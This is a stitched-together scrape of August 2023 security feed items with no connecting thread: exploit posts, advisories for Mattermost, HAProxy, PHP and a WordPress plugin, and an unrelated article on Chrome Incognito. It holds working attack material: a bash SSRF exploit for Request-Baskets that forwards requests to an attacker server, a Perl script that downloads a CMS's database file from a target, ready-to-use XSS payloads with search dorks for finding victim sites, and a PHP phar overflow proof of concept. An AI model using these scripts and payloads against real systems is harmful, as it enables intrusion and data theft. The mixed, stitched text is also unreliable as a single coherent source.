Request-Baskets version 1.2.1 suffers from a server-side request forgery vulnerability.

    # Exploit Title: Request-Baskets v1.2.1 - Server-side request forgery (SSRF)# Exploit Author: Iyaad Luqman K (init_6)# Application: Request-Baskets v1.2.1# Tested on: Ubuntu 22.04# CVE: CVE-2023-27163# PoC#!/bin/bashif [ "$#" -lt 2 ] || [ "$1" = "-h" ] || [ "$1" = "--help" ]; then    help="Usage: exploit.sh <URL> <TARGET>\n\n";    help+="Arguments:\n" \    help+=" URL            main path (/) of the server (eg. http://127.0.0.1:5000/)\n";    help+=" TARGET";    echo -e "$help";    exit 1;fiURL=$1ATTACKER_SERVER=$2if [ "${URL: -1}" != "/" ]; then    URL="$URL/";fi;BASKET_NAME=$(LC_ALL=C tr -dc 'a-z' </dev/urandom | head -c "6");API_URL="$URL""api/baskets/$BASKET_NAME";PAYLOAD="{\"forward_url\": \"$ATTACKER_SERVER\",\"proxy_response\": true,\"insecure_tls\": false,\"expand_path\": true,\"capacity\": 250}";echo "> Creating the \"$BASKET_NAME\" proxy basket...";if ! response=$(curl -s -X POST -H 'Content-Type: application/json' -d "$PAYLOAD" "$API_URL"); then    echo "> FATAL: Could not properly request $API_URL. Is the server online?";    exit 1;fi;BASKET_URL="$URL$BASKET_NAME";echo "> Basket created!";echo "> Accessing $BASKET_URL now makes the server request to $ATTACKER_SERVER.";if ! jq --help 1>/dev/null; then    echo "> Response body (Authorization): $response";else    echo "> Authorization: $(echo "$response" | jq -r ".token")";fi;exit 0;

Request-Baskets 1.2.1 Server-Side Request Forgery

DigaSell Digital Store PHP Script version 1.0.0 suffers from a cross site scripting vulnerability.

**DigaSell Digital Store PHP Script 1.0.0 Cross Site Scripting**

Posted Aug 11, 2023

Authored by indoushka

DigaSell Digital Store PHP Script version 1.0.0 suffers from a cross site scripting vulnerability.

tags | exploit, php, xss

SHA-256 | f72dfd55d23408ab5429974dee598db6c2f5f4c1ad279051decdd75964ab240b

Download | Favorite | View

**DigaSell Digital Store PHP Script 1.0.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : DigaSell - Digital store PHP Script V1.0.0 XSS Vulnerability                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : https://codecanyon.net/item/digasell-digital-store-php-script/23580305?s_rank=2                                    |  | # Dork      : "Copyright  © DigaSell All Rights Reserved."                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /browse/tags/if<script>alert(/indoushka/);</script>=2                  [+] Panel       : https://127.0.0.1/codsemcom/digasell/browse/tags/if%3Cscript%3Ealert(/indoushka/);%3C/script%3E=2Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,933)
*   Arbitrary (16,196)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,277)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,344)
*   DoS (23,416)
*   Encryption (2,370)
*   Exploit (51,861)
*   File Inclusion (4,221)
*   File Upload (973)
*   Firewall (821)
*   Info Disclosure (2,770)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,671)
*   Local (14,448)
*   Magazine (586)
*   Overflow (12,691)
*   Perl (1,423)
*   PHP (5,145)
*   Proof of Concept (2,338)
*   Protocol (3,601)
*   Python (1,535)
*   Remote (30,765)
*   Root (3,581)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,886)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,366)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (664)
*   Vulnerability (31,770)
*   Web (9,663)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,932)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,812)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,428)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,711)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,808)
*   UNIX (9,289)
*   UnixWare (186)
*   Windows (6,573)
*   Other

DigaSell Digital Store PHP Script 1.0.0 Cross Site Scripting

Mattermost fails to properly validate the requesting user permissions when updating a system admin, allowing a user manager to update a system admin's details such as email, first name and last name.



Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2023-4107

**Mattermost does not validate requesting user permissions before updating admin details**

Moderate severity GitHub Reviewed Published Aug 11, 2023 to the GitHub Advisory Database • Updated Aug 11, 2023

**Package**

gomod github.com/mattermost/mattermost-server/v6 (Go)

**Affected versions**

<= 7.8.7

\>= 7.9.0, <= 7.9.5

\>= 7.10.0, <= 7.10.3

**Patched versions**

7.8.8

7.9.6

7.10.4

**Description**

Published to the GitHub Advisory Database

Aug 11, 2023

Last updated

Aug 11, 2023

GHSA-6xjj-v76v-fwpj: Mattermost does not validate requesting user permissions before updating admin details

Categories: News
Categories: Privacy
Tags: Google

Tags:  Chrome

Tags:  Incognito

Tags:  private mode

Tags:  fingerprinting

Tags:  cookies

Tags:  tracking

Private browsing is not what users expect it to be



(Read more...)




The post Google’s “browse privately” is nothing more than a word play, lawyers say appeared first on Malwarebytes Labs.

Google will have to appear in court after a judge denied their request for summary judgment in a lawsuit filed by users alleging the company illegally invaded the privacy of millions of people.

Lawsuits against big tech over privacy issues are not much of a surprise these days, unfortunate as that may be. What makes this case stand out is that Google allegedly misled Chrome users by implying that they could browse privately by using the Incognito mode.

The judge in the suit said that Google appears to confuse users by portraying Incognito mode as a distinct offering without clearly articulated privacy terms for the service.

But despite the implied promise of privacy, Google’s cookies, analytics, and tools in apps allegedly continued to track internet browsing activity even after users activated Incognito mode.

Incognito is an option which is often used in troubleshooting browser issues, since it disables extensions and caching. Two factors that are often at play when websites do not get displayed properly.

This mode is also useful in that it essentially starts up a fresh identity for you to browse the web with, then wipes it all as soon as you close the window. This is nice if you are using a computer that isn’t your own and you want to limit your footprint.

The option to start an incognito window can be found under the hamburger icon (3 vertical dots).

At the time of writing Chrome displays this information when you start an Incognito window.

_Incognito Splash Sereen_

Note: the “Block third-party cookies” section was not present years ago.

Google's motion hinges on the idea that plaintiffs consented to Google collecting their data while they were browsing in private mode. The court ruled otherwise, because Google never explicitly told users that it does so.

Whenever a user visits a website that is running Google Analytics, Ad Manager, or some similar Google service, Google’ software directs the user's browser to send a separate communication to Google. This happens even when users are touring the web in private browsing mode, unbeknownst to website developers or the users themselves.

The lawsuit was filed in 2020, and the plaintiffs are seeking a $5,000 in damages per user, which could end up amassing $5 billion.

Let the record show that all major web browsers include a private browsing mode that does not store browsing history, cookies, or temporary files across browsing sessions. Unfortunately, users have misconceptions about what this mode does—misconceptions that are encouraged by the wording these very same browsers use when describing their own features.

A 2018 study based on user surveys among 460 participants showed that participants use private mode to hide browsing activity, prevent the saving of log-in information, and avoid cookies. A very common and big misconception, that 56.3% of participants believed, was that even though a user was logged into a Google account, their search queries would not be saved while in private mode.

One of the conclusions of the study was that of the thirteen browser disclosures about private mode that were tested, only the current and old versions of Chrome’s desktop disclosure led to significantly more correct answers. Meaning that other browsers were doing an even worse job. The term “private” is heavily overloaded and the name “private mode” implies unintended meanings. The disclosures fail at the task of correcting misconceptions users derive from the name “private mode.”

It's important to realize that a browser can be fingerprinted even in private mode and that many online tracking systems use techniques that are much more advanced than the use of cookies.

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Google’s “browse privately” is nothing more than a word play, lawyers say

In PHP version 8.0.* before 8.0.30,  8.1.* before 8.1.22, and 8.2.* before 8.2.8, when loading phar file, while reading PHAR directory entries, insufficient length checking may lead to a stack buffer overflow, leading potentially to memory corruption or RCE. 



**Summary**

Buffer mismanagement in phar_dir_read() causes a buffer overflow and a buffer overread later.

**Details**

https://github.com/php/php-src/blob/be71cadc2f899bc39fe27098042139392e2187db/ext/phar/dirstream.c#L89C1-L116

There are few issues here:

*   The if check to_read == 0 || count < ZSTR_LEN(str_key) is not right.  
    In particular, if this is false we know that count >= ZSTR_LEN(str_key).  
    Furthermore, because of to_read = MIN(ZSTR_LEN(str_key), count); we now actually have: to_read == ZSTR_LEN(str_key).  
    If we have a filename length (i.e. ZSTR_LEN(str_key)) equal to sizeof(php_stream_dirent), then we get ZSTR_LEN(str_key) == count == to_read == sizeof(php_stream_dirent).
    
    Take a look now at this line: ((php_stream_dirent *) buf)->d_name[to_read + 1] = '\0';.  
    Assume sizeof(php_stream_dirent) is 4096 like on most Linuxes. Then we write at offset 4097, which is two bytes outside of buf.  
    This line was actually supposed to use to_read instead of to_read + 1, because now even if it doesn't overflow, it does not properly NUL-terminate the filename. We're just lucky there's a memset above.  
    Correcting that to use to_read doesn't solve the whole problem: it would still overflow because it will write at offset 4096 which is still outside buf.
    
    This means we have a stack information leak and a buffer write overflow.
    
*   Both the memset and the return value assume that count == sizeof(php_stream_dirent).  
    In principle if there are any callers where that count is smaller, a buffer overflow occurs in the memset.  
    However, inside PHP itself I did not find any such caller, but this may be a concern for third-party extensions.
    

**PoC**

I created a reproducer using PHP-8.0 with these configure flags: ./configure --enable-debug --disable-all --enable-phar --with-valgrind using compiler gcc (GCC) 13.1.1 20230429.

Create the malicious Phar file using:

<?php
$phar = new Phar('myarchive.phar');
$phar\->startBuffering();
$phar\->addFromString(str\_repeat('A', PHP\_MAXPATHLEN - 1).'B', 'This is the content of the file.');
$phar\->stopBuffering();
?>

Trigger the buffer overflow and overread using this script:

<?php
$handle = opendir("phar://./myarchive.phar");
$x = readdir($handle);
closedir($handle);

var\_dump($x);
?>

If you run this in Valgrind, i.e. valgrind ./sapi/cli/php trigger.php you'll find two Valgrind complaints:

    ==42575== Conditional jump or move depends on uninitialised value(s)
    ==42575==    at 0x4847ED8: strlen (vg_replace_strmem.c:501)
    ==42575==    by 0x53BE9C: zif_readdir (dir.c:389)
    ==42575==    by 0x6D05C4: ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER (zend_vm_execute.h:1295)
    ==42575==    by 0x742F7D: execute_ex (zend_vm_execute.h:55163)
    ==42575==    by 0x747848: zend_execute (zend_vm_execute.h:59523)
    ==42575==    by 0x696376: zend_execute_scripts (zend.c:1694)
    ==42575==    by 0x5F6D45: php_execute_script (main.c:2546)
    ==42575==    by 0x788A53: do_cli (php_cli.c:949)
    ==42575==    by 0x789ADB: main (php_cli.c:1337)
    ==42575== 
    ==42575== Syscall param write(buf) points to uninitialised byte(s)
    ==42575==    at 0x4AA2BC4: write (write.c:26)
    ==42575==    by 0x7875EA: sapi_cli_single_write (php_cli.c:261)
    ==42575==    by 0x78768D: sapi_cli_ub_write (php_cli.c:293)
    ==42575==    by 0x611034: php_output_op (output.c:1082)
    ==42575==    by 0x60F2B7: php_output_write (output.c:261)
    ==42575==    by 0x5B3B0D: php_var_dump (var.c:120)
    ==42575==    by 0x5B432A: zif_var_dump (var.c:218)
    ==42575==    by 0x6D031A: ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER (zend_vm_execute.h:1234)
    ==42575==    by 0x742F6D: execute_ex (zend_vm_execute.h:55159)
    ==42575==    by 0x747848: zend_execute (zend_vm_execute.h:59523)
    ==42575==    by 0x696376: zend_execute_scripts (zend.c:1694)
    ==42575==    by 0x5F6D45: php_execute_script (main.c:2546)
    

The first complaint is because the strlen() function overreads the d\_name buffer because it isn't properly NUL-terminated.  
The second one is because it writes the name using var\_dump, and the name contains (uninitialized) stack data.  
Valgrind won't complain about the stack buffer write overflow, but you can inspect the memory using gdb for example that a piece of the stack gets overwritten.

**Impact**

Exploiting this is difficult to do and heavily depends on the application you're targetting, but possible in theory I think using a combination of stack info leaks and buffer write overflows. People who inspect contents of untrusted phar files could be affected.

CVE-2023-3824: Buffer overflow and overread in phar_dir_read()

HAProxy through 2.0.32, 2.1.x and 2.2.x through 2.2.30, 2.3.x and 2.4.x through 2.4.23, 2.5.x and 2.6.x before 2.6.15, 2.7.x before 2.7.10, and 2.8.x before 2.8.2 forwards empty Content-Length headers, violating RFC 9110 section 8.6. In uncommon cases, an HTTP/1 server behind HAProxy may interpret the payload as an extra request.

CVE-2023-40225

WordPress WP Project Manager plugin versions 2.6.4 and below suffer from a privilege escalation vulnerability.

    Description: WP Project Manager <= 2.6.4 – Arbitrary Usermeta Update to Authenticated (Subscriber+) Privilege Escalation Affected Plugin: WP Project Manager – Task, team, and project management plugin featuring kanban board and gantt chartsPlugin Slug: wedevs-project-managerAffected Versions: <= 2.6.4CVE ID: CVE-2023-3636CVSS Score: 8.8 (High)CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:HResearcher/s: Lana Codes and Chloe Chamberland Fully Patched Version: 2.6.5The WP Project Manager plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 2.6.4 due to insufficient restriction on the ‘save_users_map_name’ function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to modify their user role by supplying the ‘usernames’ parameter.Technical AnalysisWP Project Manager plugin is a task, project, and team management tool for WordPress. Upon closer examination of the code, we see that there is an API endpoint, the ‘save_users_map_name’ function, which updates a user’s github and bitbucket username.[View this code snippet on the blog.]  The most significant problem and vulnerability is caused by the way the explode() and in_array() functions are used to ensure that only the ‘github’ and ‘bitbucket’ meta values can be updated. Unfortunately, these functions are not sufficient to prevent exploitation, because they can be bypassed with a special character, known as a homoglyph, that acts like an underscore, however, won’t be properly “exploded” but will be saved in the database as a proper underscore.This made it possible for authenticated users, such as subscribers, to supply the ‘wp_capabilities’ array parameter with any desired role, such as administrator, when updating what should be username metadata, which would grant the user access to capabilities based on that role.As with any Privilege Escalation vulnerability, this can be used for complete site compromise. Once an attacker has gained administrative user access to a WordPress site they can then manipulate anything on the targeted site as a normal administrator would. This includes the ability to upload plugin and theme files, which can be malicious zip files containing backdoors, and modifying posts and pages which can be leveraged to redirect site users to other malicious sites.Disclosure TimelineJuly 9, 2023 – Discovery of the Privilege Escalation vulnerability in WP Project Manager.July 11, 2023 – We initiate contact with the plugin vendor asking that they confirm the inbox for handling the discussion.July 13, 2023 – Wordfence Premium, Care, and Response users receive a firewall rule to provide protection against any exploits that may target this vulnerability.July 16, 2023 – The vendor confirms the inbox for handling the discussion.July 16, 2023 – We send over the full disclosure details. The vendor acknowledges the report and begins working on a fix.July 24, 2023 – A fully patched version of the plugin, 2.6.5, is released.August 12, 2023 – Wordfence Free users receive the same protection.ConclusionIn this blog post, we detailed a Privilege Escalation vulnerability within the WP Project Manager plugin affecting versions 2.6.4 and earlier. This vulnerability allows authenticated threat actors with subscriber-level permissions or higher to elevate their privileges to those of a site administrator which could ultimately lead to complete site compromise. The vulnerability has been fully addressed in version 2.6.5 of the plugin.We encourage WordPress users to verify that their sites are updated to the latest patched version of WP Project Manager.Wordfence Premium, Wordfence Care, and Wordfence Response users received a firewall rule to protect against any exploits targeting this vulnerability on July 13, 2023. Sites still using the free version of Wordfence will receive the same protection on August 12, 2023.If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk.For security researchers looking to disclose vulnerabilities responsibly and obtain a CVE ID, you can submit your findings to Wordfence Intelligence and potentially earn a spot on our leaderboard.

WordPress WP Project Manager 2.6.4 Privilege Escalation

Dynamic Journal CMS version 2.5 suffers from a database disclosure vulnerability.

====================================================================================================================================  
| # Title     : Dynamic Journal cms v2.5 Database Disclosure Exploit                                                               |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            |  
| # Vendor    : http://ToastForums.com                                                                                             |    
| # Dork      :                                                                                                                    |  
====================================================================================================================================  
poc :

[-] Download the database: 

    The following Perl exploit will attempt to download the (acart.mdb ) file  
    The (acart.mdb) It is the database and contains all the data .

  [+] Dorking İn Google Or Other Search Enggine.

[+] save code as perl file : poc.pl

[+] code :

#!/usr/bin/perl -w  
#  
# Dynamic Journal cms v2.5 Database Disclosure Exploit   
#  
# Author : indoushka  
#  
# Vondor : ToastForums.com

   use LWP::Simple;  
use LWP::UserAgent;

system('cls');  
print ('Dynamic Journal cms v2.5 Database Disclosure Exploit');  
system('color a');

if(@ARGV < 2)  
{  
print "[-]How To Use\n\n";  
&help; exit();  
}  
sub help()  
{  
print "[+] usage1 : perl $0 site.com /path/ \n";  
print "[+] usage2 : perl $0 localhost / \n";  
}  
($TargetIP, $path, $File,) = @ARGV;

$File="acart.mdb";  
my $url = "http://" . $TargetIP . $path . $File;  
print "\n Fuck you wait!!! \n\n";

my $useragent = LWP::UserAgent->new();  
my $request = $useragent->get($url,":content_file" => "D:/acart.mdb");

if ($request->is_success)  
{  
print "[+] $url Exploited!\n\n";  
print "[+] Database saved to D:/acart.mdb\n";  
exit();  
}  
else  
{  
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";  
exit();  
}

====Greetings to :=========================================================================================================================  
| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |  
===========================================================================================================================================

Dynamic Journal CMS 2.5 Database Disclosure

DriverPack Solution CMS version 17.11.108 suffers from a cross site scripting vulnerability.

**DriverPack Solution CMS 17.11.108 Cross Site Scripting**

Posted Aug 10, 2023

Authored by indoushka

DriverPack Solution CMS version 17.11.108 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | e6bbd0f2f85c5a85db0341ad4fa0a655765bd7b91a5cc41a6d0b07469ab56025

Download | Favorite | View

**DriverPack Solution CMS 17.11.108 Cross Site Scripting**

    ====================================================================================================================================| # Title     : DriverPack Solution CMS v 17.11.108 Xss Vulnerability                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : https://driverpack.io/                                                                                             |  | # Dork      : n/a                                                                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] Use xss payload : _%3C/script%3E%3Cscript%3Eprompt(/indoushka/)%3C/script%3E&password=zeb[+] http://target_site/en?email=_%3C/script%3E%3Cscript%3Eprompt(/indoushka/)%3C/script%3E&password=zebGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,928)
*   Arbitrary (16,193)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,275)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,344)
*   DoS (23,416)
*   Encryption (2,370)
*   Exploit (51,848)
*   File Inclusion (4,221)
*   File Upload (973)
*   Firewall (821)
*   Info Disclosure (2,768)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,670)
*   Local (14,447)
*   Magazine (586)
*   Overflow (12,690)
*   Perl (1,423)
*   PHP (5,144)
*   Proof of Concept (2,338)
*   Protocol (3,601)
*   Python (1,535)
*   Remote (30,759)
*   Root (3,580)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,886)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,364)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (664)
*   Vulnerability (31,767)
*   Web (9,662)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,930)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,810)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,423)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,711)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,805)
*   UNIX (9,289)
*   UnixWare (186)
*   Windows (6,572)
*   Other

DriverPack Solution CMS 17.11.108 Cross Site Scripting

Desenvolvido C3iM CMS version 2.0 suffers from a cross site scripting vulnerability.

**Desenvolvido C3iM CMS 2.0 Cross Site Scripting**

Posted Aug 10, 2023

Authored by indoushka

Desenvolvido C3iM CMS version 2.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | ee75f970e155669b73118332fbaa7e9c33f33900005bfc151805b9ba771cd102

Download | Favorite | View

**Desenvolvido C3iM CMS 2.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : Desenvolvido C3iM CMS v2.0 XSS Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            | | # Vendor    : http://c3im.pt/                                                                                                    |  | # Dork      : intext:''Desenvolvido C3iM'' site:pt                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : <marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] http://127.0.0.1/conteudo.php?id=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,928)
*   Arbitrary (16,193)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,275)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,344)
*   DoS (23,416)
*   Encryption (2,370)
*   Exploit (51,848)
*   File Inclusion (4,221)
*   File Upload (973)
*   Firewall (821)
*   Info Disclosure (2,768)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,670)
*   Local (14,447)
*   Magazine (586)
*   Overflow (12,690)
*   Perl (1,423)
*   PHP (5,144)
*   Proof of Concept (2,338)
*   Protocol (3,601)
*   Python (1,535)
*   Remote (30,759)
*   Root (3,580)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,886)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,364)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (664)
*   Vulnerability (31,767)
*   Web (9,662)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,930)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,810)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,423)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,711)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,805)
*   UNIX (9,289)
*   UnixWare (186)
*   Windows (6,572)
*   Other

Tag

#perl